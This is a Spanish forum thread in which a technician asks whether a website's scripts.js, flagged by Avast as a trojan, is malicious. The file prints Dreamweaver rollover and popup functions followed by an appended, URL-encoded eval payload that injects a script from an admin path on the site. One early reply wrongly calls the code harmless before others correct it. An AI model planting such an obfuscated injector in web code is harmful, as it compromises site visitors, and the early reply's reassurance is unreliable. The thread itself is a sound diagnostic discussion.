es esto un troyano?

Hola, perdón si meto este tema en la seccion q no corresponde pero no tengo ni idea de qué es ni nada.
Yo simplemente soy tecnico, pero un cliente me solicitó que vea por qué razón saltaba siempre el antivirus diciendo q habia un troyano (JS:Redirector-B [Trj] según Avast!) al entrar al sitio, pude ver q estaba en un archivo scripts.js (lo cual no sé q es ni para que sirve), y al abrir con el bloc de notas veo esto:

function MM_preloadImages() { //v3.0

var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();

var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)

if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}

}

function MM_swapImgRestore() { //v3.0

var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;

}

function MM_findObj(n, d) { //v4.01

var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];

for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);

if(!x && d.getElementById) x=d.getElementById(n); return x;

}



function MM_swapImage() { //v3.0

var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)

if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}

}

function openCenteredWindow(url, name, width, height, features) {

if(screen.width){

var winl = (screen.width-width)/2;

var wint = (screen.height-height)/2;

} else {

winl = 0;

wint =0;

}

if (winl < 0) winl = 0;

if (wint < 0) wint = 0;

var settings = 'height=' + height + ',';

settings += 'width=' + width + ',';

settings += 'top=' + wint + ',';

settings += 'left=' + winl + ',';

settings += features;

win = window.open(url, name, settings);

win.window.focus();

}

function openNewsPopup(id, context_path) {

openCenteredWindow(context_path + '/popup.php?id=' + id, 'news_popup', 500, 465, 'scrollbars=yes, resizable=no')

}

function popupGaleriaNov( id ) {

openCenteredWindow('../novedades/galeria.php?id=' + id, 'novedades_popup', 435, 400, 'scrollbars=no, resizable=no')

}

function popupRecomendar( id ) {

openCenteredWindow('../recomendar/index.php?id=' + id, 'recomendar_popup', 470, 500, 'scrollbars=yes, resizable=no')

}
/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65% 6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64 %28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3 D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%37%32%30% 34%36%32%3B%20%4A%53%53%33%20%3D%20%27%2F%5F%61%64 %6D%69%6E%2F%5F%68%74%6D%6C%61%72%65%61%2F%70%6F%7 0%75%70%73%2F%65%6D%6F%71%2F%64%75%6D%6D%79%2E%68% 74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63 %75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%6 5%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73% 2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72 %63%27%2C%20%27%2F%5F%61%64%6D%69%6E%2F%5F%68%74%6 D%6C%61%72%65%61%2F%70%6F%70%75%70%73%2F%65%6D%6F% 71%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E %73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%2 7%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D% 65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79 %54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%6 9%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69% 6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */
Alguien me podría decir si este archivo es necesario por algo (sé q o saben qué web es) pero según su contenido y si solo una parte está "infectada" o todo es "malisioso"? GRACIAS!

perdon por la ignorancia pero sé q aquí me ayudarán como muchas otras veces.

PD: al querer enviar este post con el antivirus activo me salta otra vez, no es mi intención hacer mal, calculo que no lo hará

Hola inorganico0:

Ese código que has posteado no es malicioso, ni tiene fines malignos. Aunque la última parte (esas letras sin sentido que empiezan por /* y acaban por */) no se sabe a ciencia cierta qué pueden hacer. De todas maneras los caracteres /* y */ comentan líneas, haciendo que esa parte no se procese y es como si no estuviera, así que no es relevante.

Ese código tiene como finalidad abrir unos popups en caso de necesitarlos (para noticias, una galería de imágenes y una sección de recomendar, al parecer). También se encarga de hacer un efecto de cambiar la una imagen cuando se pasa el ratón por encima (rollover).

Puede que el Avast lance un JS:Redirector-B porque considera molestos los popups ¿?, pero no veo redirecciones por ningún lado.

En conclusión: código totalmente normal.

Saludos.

Al fin he logrado responder .
Hay que tener en cuenta que eval está fuera de los comentarios así que sí se ejecuta, la parte de la redirección yo la he copiado en un archivo a parte y no es el virus, pero después de copiar el eval sí salta el antivirus. De hecho, he buscado información y realmente no solo el avast sino varios otros antivirus lo reconocen como troyano.

Hola, gracias por responder, entonces según las 2 respuestas seria conveniente eliminar eso ultimo q arranca desde "/* a0b4df006e02184c60dbf503e71c87ad */", la verdad es que yo no sé manejar este lenguaje así q simplemente les hago caso borrando eso y volviendo a probar.

MUCHAS GRACIAS!

Ups, vaya, me he dejado de leer esa parte David. Creí que todo el bloque era comentado.

¿Qué podrá ser? No es que esté muy puesto con la seguridad de javascript pero supongo que dependerá sobre qué navegador ejecutemos ese código y sobre qué SO...

Si ponemos document.write( escape("...(toda la ristra)..") ); tendremos algo como esto (escrito en una línea, pero lo idento para leerlo mejor):
¿Es ilícito para algunos antivirus añadir un elemento script en un documento dinámicamente? Sería bueno concretar qué tiene /_admin/_htmlarea/popups/emoq/check.js, pero entonces el antivirus supongo que diría que lo malicioso está ahí y no en el archivo que nos ocupa.

Vaya cosa más rara, es realmente extraño que el antivirus salte en esa parte del código, quizás sea un script que se aproveche de algún bug de algún navegador quizás un poco más antiguo y consta en la base de datos de los antivirus .